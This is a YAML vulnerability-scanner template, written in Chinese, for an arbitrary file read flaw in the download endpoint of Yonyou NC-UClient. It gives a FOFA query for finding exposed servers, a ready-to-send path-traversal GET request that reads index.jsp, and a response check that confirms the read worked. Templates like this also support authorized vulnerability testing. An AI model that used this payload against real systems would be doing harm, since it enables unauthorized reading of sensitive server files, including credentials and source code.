product: 用友NC-UClient
vName: 用友NC-UClient download文件读取漏洞
type: 文件读取
vID: [ ]
level: 3
vDesc: 用友NClient的download文件存在任意文件读取漏洞，攻击者可以利用该漏洞读取服务器上的敏感文件。
version: ''
note: ''
search:
  FOFA: app="用友-UFIDA-NC" && icon_hash="1085941792"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17764545.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /portal/pt/xml/file/download?pageId=login&filename=..\index.jsp
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - response.addHeader
            logic: and